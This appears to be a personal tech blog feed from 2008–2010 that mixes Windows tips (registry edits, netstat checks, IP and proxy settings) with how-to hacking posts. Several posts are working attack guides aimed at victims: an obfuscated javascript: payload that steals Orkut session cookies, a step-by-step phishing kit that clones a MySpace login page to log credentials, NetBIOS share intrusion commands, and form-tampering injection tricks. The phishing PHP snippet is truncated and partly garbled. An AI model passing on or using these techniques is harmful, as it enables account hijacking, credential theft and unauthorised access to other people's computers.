Karthik Writes The Best!

RAJNIKANTH.H code !!

noreply@blogger.com (Karthik) — Mon, 29 Nov 2010 13:57:00 +0000

Highly confidential code of rajnikanth.h leaked... Can't believe its so simple.. :-P

------------START RAJNIKANTH.H-----------------
/* rajnikanth.h

Defines everything in the world!
Copyright (c) RAJNIKANTH
All Rights Reserved.
*/

#ifndef __RAJNIKANTH_H
#define __RAJNIKANTH_H

void _Cdecl iDidEverything(...);
void _Cdecl iAmDoingEverything(...);
void _Cdecl iWillDoEverything(...);
void _Cdecl iCanDoAnything(...);

------------END OF RAJNIKANTH.H-----------------

Auto End Tasks to Enable a Proper Shutdown

noreply@blogger.com (Karthik) — Wed, 22 Sep 2010 11:30:00 +0000

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"

2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

Checking Your PC for infection

noreply@blogger.com (Karthik) — Tue, 21 Sep 2010 14:07:00 +0000

When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),
open a MS-DOS Prompt window (start/programs MS-DOS Prompt).
Then type netstat -arn and press the Enter key.
Your screen should display the following (without the dotted lines
which I added for clarification).

-----------------------------------------------------------------------------
Active Routes:

  Network Address Netmask Gateway Address Interface Metric
   127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
  255.255.255.255 255.255.255.255 255.255.255.255 0.0.0.0 1

Route Table

Active Connections

  Proto Local Address Foreign Address State

--------------------------------------------------------------------------------

If you see anything else, there might be a problem (more on that later).
Now dial into your ISP, once you are connected;
go back to the MS-DOS Prompt and run the same command as before
netstat -arn, this time it will look similar to the following (without
dotted lines).

-------------------------------------------------------------------------------------

Active Routes:

  Network Address Netmask Gateway Address Interface Metric
   0.0.0.0 0.0.0.0 216.1.104.70 216.1.104.70 1
   127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
   216.1.104.0 255.255.255.0 216.1.104.70 216.1.104.70 1
   216.1.104.70 255.255.255.255 127.0.0.1 127.0.0.1 1
   216.1.104.255 255.255.255.255 216.1.104.70 216.1.104.70 1
   224.0.0.0 224.0.0.0 216.1.104.70 216.1.104.70 1
  255.255.255.255 255.255.255.255 216.1.104.70 216.1.104.70 1

Route Table

Active Connections

  Proto Local Address Foreign Address State
  TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
  TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
  TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
  TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
  UDP 216.1.104.70:137 *:*

--------------------------------------------------------------------------------

What you are seeing in the first section (Active Routes) under the heading of
Network Address are some additional lines. The only ones that should be there
are ones belonging to your ISP (more on that later). In the second section
(Route Table) under Local Address you are seeing the IP address that your ISP
assigned you (in this example 216.1.104.70).

The numbers are divided into four dot notations, the first three should be
the same for both sets, while in this case the .70 is the unique number
assigned for THIS session. Next time you dial in that number will more than
likely be different.

To make sure that the first three notation are as they should be, we will run
one more command from the MS-DOS window.
From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .net
or whatever it ends in. Following is an example of the output you should see.

---------------------------------------------------------------------------------------

Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops:
1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4]
2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1]
3 108 ms 116 ms 119 ms www.motion.net [207.239.117.112]
Trace complete.

------------------------------------------------------------------------------------------

You will see that on lines with the 1 and 2 the first three notations of the
address match with what we saw above, which is a good thing. If it does not,
then some further investigation is needed.

If everything matches like above, you can almost breath easier. Another thing
which should you should check is programs launched during startup. To find
these, Click start/programs/startup, look at what shows up. You should be
able to recognize everything there, if not, once again more investigation is
needed.

-------------------------------------------------------------------------------------------

Now just because everything reported out like we expected (and demonstrated
above) we still are not out of the woods. How is this so, you ask? Do you use
Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
that makes use of the Internet. Have you every recieved an email with an
attachment that ended in .exe? The list goes on and on, basically anything
that you run could have become infected with a trojan. What this means, is
the program appears to do what you expect, but also does just a little more.
This little more could be blasting ebay.com or one of the other sites that
CNNlive was talking about.

What can you do? Well some anti-virus software will detect some trojans.
Another (tedious) thing is to start each of these "extra" Internet programs
one at a time and go through the last two steps above, looking at the routes
and connection the program uses. However, the tricky part will be figuring
out where to tracert to in order to find out if the addresses you see in
step 2 are "safe" or not. I should forewarn you, that running tracert after
tracert, after tracert might be considered "improper" by your ISP. The steps
outlined above may not work exactly as I have stated depending upon your ISP,
but with a true ISP it should work. Finally, this advise comes with NO
warranty and by following my "hints' you implicitly release me from ANY and
ALL liability which you may incur.

Other options

Display protocol statistics and current TCP/IP network connections.
Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]

-a.. Display all connections and listening ports.
-e.. Display Ethernet statistics. This may be combined with the -s option.
-n.. Diplays address and port numbers in the numerical form.
-p proto..Shows connections for the protocol specified by proto; proto may be
TCP or UDP. If used with the -s option to display per-protocol statistics,
proto may be TCP, UDP, of IP.
-r.. Display the routing table.
-s.. Display per-protocol statistics. By default, statistics are shown for TCP
UDP and IP; the -p option may be used to specify a subset of the default
interval..Redisplay selected statistics, pausing intervals seconds between each
display. If omitted. netstat will print the current configuration information
once

Finding Identity Online!

noreply@blogger.com (Karthik) — Fri, 17 Sep 2010 05:51:00 +0000

When the network that is now the Internet was first designed, it was assumed that all users wanted to be found. No one had reason to hide, and it seemed sensible that researchers should be able to locate each other. Utilities were therefore created to facilitate such finding.

Since those early days, the rise of multiple protocols has made finding people even more convenient. As you will see later in this chapter, the old days demanded a high level of networking knowledge from the user. Today, finding or identifying most individuals is trivial. Throughout this chapter, I examine those techniques, as well as some concepts about wholesale tracing (tracing many individuals at one time).

You may wonder why this is deemed a security issue. In truth, it really isn't--not yet. As you read this chapter, however, you will learn that the Internet is a powerful tool for domestic spying. Law-enforcement and intelligence agencies already conduct such practices on the Internet, and for them, the Network is a bonanza. No search warrant is needed to "study" the activity of someone on the Internet. Likewise, no warrant is needed to compile lists of individuals who law enforcement perceive to be involved in illegal (or even seditious) activity. This is not a joke. If you harbor radical political views, by the end of this chapter, you may elect to forever keep those views to yourself (or gain a decent education in cryptography).

What's in a Name?

There are two forms of user identification that apply to all platforms: your e-mail address and your IP address. It is often theorized that if one is obscured, the other can never be found. That is untrue. Without chaining messages through a series of trusted anonymous remailers (remailers that are purportedly secure), anonymity on the Internet is virtually impossible. Anonymous remailers are discussed in Chapter 7, "Birth of a Network: The Internet."

It is possible, however, to make yourself relatively invisible, and that is probably what most individuals would like to do. Before I get more specific, however, there are some utilities you need to know about, as well as methods of tracing individuals. I'll start with finger.

finger

The finger service is a utility common to the UNIX platform. Its purpose is to provide information about users on a given system. In practical operation, finger works like most other services available in UNIX.

The finger service relies on the client/server model, which is a recurring theme in Internet applications. This model works as follows: machines running server applications distribute information to clients. Clients are programs designed to accept and interpret information from server applications. For example, you use a Web browser (or client) to read information forwarded by a Web server (the HTTP server).

In any event, the finger client-server relationship works as follows: On the targeted machine (almost always a UNIX system), there is a server running called fingerd. This is more commonly referred to as the finger daemon. Its purpose is to answer requests from finger clients from the void.

The finger daemon can return different information, depending largely on the configuration of the server and the user's personalized settings. For example, sometimes an "open" UNIX server (that is, one not running a firewall) will disallow finger access. This is done by disabling the finger daemon, removing it from the file /etc/inetd.conf. In this case, the finger service is never started. Any client-issued finger request forwarded to such a machine will meet with a blank response (or perhaps, Connection Refused.).

Many organizations, particularly ISPs, government sites, and private corporations, disable finger services. Each has an interest in preserving the privacy of its users, and that is usually the reason given for disabling the service. As you will learn later, however, their motivation may also be system security.

Some sites do not disable finger services altogether, but instead put restrictions on what type of information can be accessed. For example, by default, the finger daemon allows a systemwide finger. Anyone can be fingered, including special or privileged accounts. When systemwide fingering is allowed, one can gather information on all users currently logged to the machine. This is done by issuing the following command at a UNIX command prompt:

finger @my_target_host.com

The @ symbol has essentially the same effect as the asterisk does in regular expression searches. When it is used, the user is fingering all users currently logged to the target machine. This is most useful when targeting small providers that have few customers, or when conducting such a finger query late at night. Certainly, fingering a company as large as Netcom in this manner would be foolish. (The response forwarded by the server would likely be many pages in length. The only valid reason for doing this would be to generate a database of Netcom users.) At any rate, some organizations will disallow such a request, instead forcing the requesting party to specify a particular user.

Other sites make use of hacked finger daemons, either created in-house or available as distributions from other sites across the Internet. These are finger daemons that have enhanced features, including advanced configuration options.

At any rate, taking you through the process of a finger inquiry will take just a few moments, but in order for you to exploit the example, you need a finger client. UNIX users, however, have no need for a finger client, because this is included in the basic distribution.Finger client for Windows can be found at ftp://papa.indstate.edu/winsock-l/finger/wsfngr14.zip

A Few Words About Cookies

You have seen the message many times. You land on a WWW site and a dialog box appears. The server at the other end says it wants to set a cookie. Most users have no idea what this means, so they simply click the OK button and continue. Other users actually read the dialog box's contents and get a little worried. (This is especially true when the cookie is going to be set for sometime into the year 2000. The user may not be sure what a cookie is, but almost all users balk when that cookie is going to hang around for 3 or 4 years.)

What are cookies? The cookie concept is very much like getting your hand stamped at a dance club. You can roam the club, have some drinks, dance, and even go outside to your car for a few minutes. As long as the stamp is on your hand, you will not have to pay again, nor will your access be restricted. But cookies go much further than this. They record specific information about the user, so when that user returns to the page, the information (known as state information) can be retrieved. The issue concerning cookies, though, isn't that the information is retrieved. The controversy is about where the information is retrieved from: your hard disk drive.

Cookies (which Netscape calls persistent client state HTTP cookies) are now primarily used to store options about each user as he browses a page. The folks at Netscape explain it this way:

"This simple mechanism provides a powerful new tool which enables a host of new types of applications to be written for Web-based environments. Shopping applications can now store information about the currently selected items, for fee services can send back registration information and free the client from retyping a user-id on next connection, sites can store per-user preferences on the client, and have the client supply those preferences every time that site is connected to. "

The WHOIS Service

The WHOIS service (centrally located at http://who.is) contains the domain registration records of all Internet sites. This registration database contains detailed information on each Internet site, including domain name server addresses, technical contacts, the telephone number, and the address. Here is a WHOIS request result on the provider Netcom, a popular Northern California Internet service provider:

NETCOM On-Line Communication Services, Inc (NETCOM-DOM)    3031 Tisch Way, Lobby Level    San Jose, California 95128    US    Domain Name: NETCOM.COM    Administrative Contact:       NETCOM Network Management  (NETCOM-NM)  dns-mgr@NETCOM.COM       (408) 983-5970    Technical Contact, Zone Contact:       NETCOM DNS Administration  (NETCOM-DNS)  dns-tech@NETCOM.COM       (408) 983-5970    Record last updated on 03-Jan-97.    Record created on 01-Feb-91.    Domain servers in listed order:    NETCOMSV.NETCOM.COM          192.100.81.101    NS.NETCOM.COM                192.100.81.105    AS3.NETCOM.COM               199.183.9.4

Here, the snooping party has discovered that the provider is in the state of California !

A Simple Encryption Algorithm!

noreply@blogger.com (Karthik) — Fri, 17 Sep 2010 05:27:00 +0000

int Encrypt(char a)

{

if (a == ' ')

return 95;

else if (a == '\n')

return 96;

for (int x = 0; a != x; x++)

{

if (a-33 == x)

return x;

}

return 0;

}

Proxy Servers!

noreply@blogger.com (Karthik) — Sat, 13 Jun 2009 18:10:00 +0000

Hackers are everywhere portscanning IP addresses for security holes! Finding a security hole in your IP makes you vulnerable to many kinds of attack! One of the ways of defending yourself from these kind of hackers is by using Proxy Servers.

WHAT IS A PROXY SERVER?
Its a software that hides your IP address and thereby prevent unauthorized access to your computer through the Internet. They do not provide anyone with your IP address and effectively hide any information about you and your reading interests. Besides that, they don’t even let anyone know that you are surfing through a proxy server. Anonymous proxy servers can be used for all kinds of Web-services, such as Web-Mail (MSN Hot Mail, Yahoo mail), web-chat rooms, FTP archives, etc.

HOW TO SETUP A PROXY SERVERS?
Go to control panel
1)Phone and modem options
2)In that select Advanced tab
3)In Providers list, click Microsoft H.323 Telephony Service Provider, and then click Configure.
4)In Configure check H.323 Service Provider
5)To specify an H.323 proxy, select the Use H.323 proxy, and then type the server name or IP address for the proxy.

Do not know how to configure it? Then try out the proxy software from http://www.proxy4free.com

Source: http://www.proxy4free.com/

Change Windows Admin password

noreply@blogger.com (Karthik) — Fri, 14 Nov 2008 10:03:00 +0000

1.go to Run-> type 'lusrmgr.msc' without quotes
2.there u will see admin or administrator.
3.right click on it and select set password.
4.type the desired password twice and you are done!This will not even for old password!

Trick to change your ip address to new ip address

noreply@blogger.com (Karthik) — Fri, 14 Nov 2008 09:55:00 +0000

you can surf anonymously after changing the ip address so that the risk of getting hacked is less.Steps involved in changing the ip address.
1.Click run
2.Type "cmd" and press "enter"
3.type "ipconfig/release" and press "enter"
4.Type "exit" and press "enter"
5. click "Network connections" in your control panel
6.select local area connection and click properties
7.Double click "TCP/IP" under "general tab".
8.select "Use the following ip address"
9.Type any numbers until the area get filled.
10.Click "TAB" so that it will automatically fill the Subnet Mask
11.click ok
12.again click ok
13.Repeat steps 6 and 7
14.select "obtain ip address automatically"
15.click ok
16.Now YOu have a new ip address
17.Enjoy safe surfing with a new ip address

Hacking Orkut Accounts through cookie stealing..

noreply@blogger.com (Karthik) — Mon, 03 Nov 2008 09:46:00 +0000

Procedure to hack gmail or orkut through mozilla by stealing cookies:-
1.Firstly you need have Mozilla firefox.

2.Download cookie editor plugin for Mozilla firefox from:
https://addons.mozilla.org/en-US/firefox/addon/573

3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit()
How to use cookies script?
1. Replace your number "UserId.value=33444211"
How to Replace your Number
1.Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.
Your script will look like.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter

3.You'll Get his cookie in your scrap book.

4.After Getting a cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you'll be in your victims Homepage.

Hacking Accounts through phishing......

noreply@blogger.com (Karthik) — Mon, 03 Nov 2008 09:33:00 +0000

1. Intro
There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.We will use t35. Go to http://www.t35.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code),and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'login.php'(without the ''), and save it.Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/login.php' - where 'xxx' is the name of your account.But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'login.php' file. Search in the code for keywords 'action='.There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:

Code:
h5 class="heading"
Member Login
form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm"

and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
Change:
action="http:// secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="phish.php"and save the file.
Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the '
http://secure.myspace.com/index.cfm?fuseaction=login.process' file.

Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'phish.php' file on your site(which doesn't exist yet).All we have to do now, is to create a 'phish.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'phish.php'(without the quotes) and paste the following code in it:
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of phish.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).Congratulations! You have a phisher!!!

The link to your phish site is: http://xxx.t35.com/login.php -where 'xxx' is your account name.The link to your text file is: http://xxx.t35.com/passwords.txtOr you may access it from your account.
Note that you can choose whatever names you like for login.php, phish.php and passwords.txt. but the .php and .txt must stay the same.

4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
Code:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]

For example, www.google.com looks like a google, but it leads you to yahoo when you click it.If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.HeheLike this:
Code:
[url=YourPhishSiteLink][img]link of the image[/img][/url]

Multiple Logins of Gmail and Orkut through firefox

noreply@blogger.com (Karthik) — Sun, 19 Oct 2008 04:28:00 +0000

Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.
Step 1:Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

Step 2:variable name: moz_no_remote (should be all small letter).variable value: 1

Step 3:open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.

When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Introduction to MMORPGs

noreply@blogger.com (Karthik) — Mon, 13 Oct 2008 08:33:00 +0000

MMORPG is short for Massively Multiplayer Online Role-Playing Game. MMORPGs are client-
server model games in which players, running the client software, are engaged in the game
world through a player-customized character an avatar. The game provider or publisher hosts
through a server the persistent, or virtual, world that these players inhabit. A world-wide stream of players constantly interacting with this ever-changing virtual world, always available for play, mark the principle characteristic of the Massively Multiplayer Online Role-Playing Game.

Security Breaching..

noreply@blogger.com (Karthik) — Tue, 22 Jul 2008 06:56:00 +0000

If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -
Click "Start -> Run -> cmd"

Type the following at the Dos Prompt
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________

The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>.
A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this.
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)

This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there

for more info visit
http://windowsstart.blogspot.com/2008/06/hackig-in-15-seconds.html

Javascript injection technique

noreply@blogger.com (Karthik) — Sun, 06 Jul 2008 10:37:00 +0000

This tutorial is going to teach you the basics of Javascript Injections. They are fairly simple if you know Javscript already. This is in a way a type of hacking. You can do many many things with this, such as, alter form values, alter cookies, set cookies, gain access to restricted pages, and as I said, much much more.

Hello World! is the easiest thing you can do. It doesn't effect a page, but it deffinatly gets you an understanding of how this is going to work. First of all, all Javascript Injections are preformed in the URL Bar (Address Bar). So go to any website you want, It doesn't really matter at all. Then, type in the URL Bar:

javascript:alert('Hello World!');

Now, let me explain what this does

javascript: This lets the browser you are using know that you are about to enter some sort of a Javascript command.

alert: This will make a little box pop up with the infor you wished to see. In our case. "Hello World"

('Hello World!'): This will be what is displayed in out alert box. Don't forget the quotes, otherwise it won't work properly.

;: As with almost every single Scripting/Programming language, you need to remember this at the end of almost every line of code. It won't work right without it.

If you did all that right, after you hit the enter button, you would have gotten a pop-up box displaying "Hello World".

Working With Cookies

This, can be a tiny bit more difficult to understand at first. And it still is for me, because I am sucky when it comes to Javascript. So I won't be the best at explaining every bit of this. But if you follow right, you should get it. Now, as before, go to any website you wish. For this tutorial, I will be using Tizag.com. Clear your address bar, and type:

Code:

javascript:alert(document.cookie);

If you did that right, depending on the website, you should get a bunch of jumbled leters and things, or something along those lines. This can very quite a bit from website to website. Lets break this up though and go over what everything does. (I'm only going to go over the new bits, if you forgot what the first bits were, go back up and read about it.

(document.cookie) This will display the cookies that that website has set. Notice that there aren't any quotes around it? If there were, it would just display "document.cookie" in your little pop-up box, because it reads it as plain text.

Now lets add some cookies to a page. On that same webpage, view the cookies, using the previous method, and remember what they are, because we are going to add to that. Here is the script:

Code:

javascript:void(document.cookie = "Access = Granted");

Nothing will happen; or so it seems. After you hit enter again, clear that, and view the cookies again. If you did it right, you will see either at the begginning or the end of the cookie contents, "Access=Granted". This is one of those ways you can get past like, say, a forum ban. They just set it so that you couldn't get in anymore. Now, I'm not saying it will work, because, it probly won't, becuase most forum software's are way more secure that that, using PHP IP Blocks and such. But I'm not going to bother going over that. Now, lets go over what we just did.

void: This is just one of those things I am not to clear about. I would say what I think it is, but I don't want to make a fool of myself.

(document.cookie = "Access = Granted"): This gets into the cookies, and then adds the cookie saying that Access is granted. (Just an example, you could use anything.)

Alter Forms

Sometimes, to edit values sent to a given website through a form, you can download the html and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from javascript. Note: The changes are only temporary, so it's no tuse trying to deface a site through javascript injection like this.

Every form on a given webpage (unless named otherwise) is stored in the forms[x] array... where "x" is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, and the second would be 1 and so on. Here is a sample form which we will alter:

Code:

And now, here is the Javascript Injection we will use to alter the values of the form.

Code:

javascript:alert(document.forms[0].to.value)

Now, without having to read the source code and find out all the form information, just do that, and it will display the first forms information on the page you are trying to tweak.

Code:

javascript:void(document.forms[0].to.value="email@nhacks.com")

Now that you have the information stored in the forms, you need to change it to your likings. In our case, we changed the e-mail to something that suited us. Because, lets pretend that for some reason, this form was sending vital information about a major website. Now it will send it all to the e-mail we just put in.

Password Hacking methods often used..

noreply@blogger.com (Karthik) — Thu, 03 Jul 2008 15:02:00 +0000

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
***Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

***A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

***Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

***Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Registry guide for amatuers..

noreply@blogger.com (Karthik) — Thu, 03 Jul 2008 14:44:00 +0000

The Registry is a database used to store settings and options for the 32 bit versions of M*cro$oft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor"

The Structure of The Registry :

The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.

Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:
* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.
* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.
* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.
* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.
* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.
* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.

Each registry value is stored as one of five main data types:

* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.
* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_SZ - This type is a standard string, used to represent human readable text values.

Editing The Registry :

The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.

Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign.

